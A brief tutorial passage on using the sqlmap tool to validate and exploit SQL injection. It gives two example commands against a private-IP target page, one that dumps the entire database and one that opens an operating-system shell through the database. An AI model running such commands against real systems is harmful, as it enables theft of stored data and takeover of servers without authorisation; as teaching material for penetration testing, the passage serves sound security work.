SQLmap is one of the popular tools for validating a sql injection vulnerability and exploiting it. The tool takes care of checking various flaws such as the ones mentioned in the previous sections before presenting with the option to exploit them.
sqlmap -u http://192.168.1.1/pricelist.php?id=1 -p "id" --dbms=mysql --dump
Two important parameters that are passed to the command,
p - the parameter that can be exploited for SQL injection
dbms - The type of database
The above command dumps all the information from the database.
It is possible to exploit the remote shell vulnerability a database might posses through SQLmap using the following command,
sqlmap -u http://192.168.1.1/pricelist.php?id=1 -p "id" --dbms=mysql --os-shell
Last updated 3 years ago
